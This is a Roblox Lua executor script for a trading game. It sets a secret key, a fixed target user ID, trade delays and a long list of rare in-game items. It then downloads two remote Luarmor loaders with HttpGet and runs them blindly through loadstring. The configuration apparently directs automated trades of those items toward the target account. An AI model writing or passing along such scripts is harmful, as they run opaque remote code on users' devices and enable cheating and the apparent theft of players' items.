getgenv().SECRET_KEY = "mrr_1e7decd31b1249cb88e9906a5d2ec5ba"
getgenv().TARGET_ID = 2785892803
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().TARGET_BRAINROTS = {
    ["Los Combinasionas"] = true,
    ["Strawberry Elephant"] = true,
    ["Meowl"] = true,
    ["Headless Horseman"] = true,
    ["Skibidi Toilet"] = true,
    ["Griffin"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Dragon Cannelloni"] = true,
    ["Love Love Bear"] = true,
    ["La Supreme Combinasion"] = true,
    ["Celestial Pegasus"] = true,
    ["Cerberus"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Rosey and Teddy"] = true,
    ["Capitano Moby"] = true,
    ["Cooki and Milki"] = true,
    ["Burguro And Fryuro"] = true,
    ["Ketupat Bros"] = true,
    ["Reinito Sleighito"] = true,
    ["Fortunu and Cashuru"] = true,
    ["Los Amigos"] = true,
    ["La Secret Combinasion"] = true,
    ["Los Sekolahs"] = true,
    ["Signore Carapace"] = true,
    ["La Casa Boo"] = true,
    ["Fragrama and Chocrama"] = true,
    ["La Food Combinasion"] = true,
    ["Elefanto Frigo"] = true,
    ["Spooky and Pumpky"] = true,
    ["Ginger Gerat"] = true,
    ["La Ginger Sekolah"] = true,
    ["Sammyni Fattini"] = true,
    ["Los Spaghettis"] = true,
    ["Festive 67"] = true,
    ["Ventoliero Pavonero"] = true,
    ["Cloverat Clapat"] = true,
    ["Antonio"] = true,
    ["Garama and Madundung"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Lavadorito Spinito"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Orcaledon"] = true,
    ["La Romantic Grande"] = true,
    ["Tictac Sahur"] = true,
    ["La Taco Combinasion"] = true,
    ["Ketupat Kepat"] = true,
    ["Dug dug dug"] = true,
    ["Tang Tang Keletang"] = true,
    ["Lovin Rose"] = true,
    ["Los Tacoritas"] = true,
    ["Eviledon"] = true,
    ["Los Primos"] = true,
    ["W or L"] = true,
    ["Esok Sekolah"] = true,
    ["La Jolly Grande"] = true,
    ["Los Cupids"] = true,
    ["Los Puggies"] = true,
    ["Tralaledon"] = true,
    ["Gobblino Uniciclino"] = true,
    ["Tuff Toucan"] = true,
    ["Chipso and Queso"] = true,
    ["Chillin Chili"] = true,
    ["Money Money Reindeer"] = true,
    ["La Spooky Grande"] = true,
    ["Los Bros"] = true,
    ["Las Sis"] = true,
    ["Fishino Clownino"] = true,
    ["Nacho Spyder"] = true,
    ["Gold Gold Gold"] = true,
    ["Tirilikalika Tirilikalako"] = true,
    ["Swaggy Bros"] = true
}
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/fbcd1d25889a843297107dea3642044d.lua"))()
end)
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/387a5df3b561f6821c25654316d0e352.lua"))()
  end)
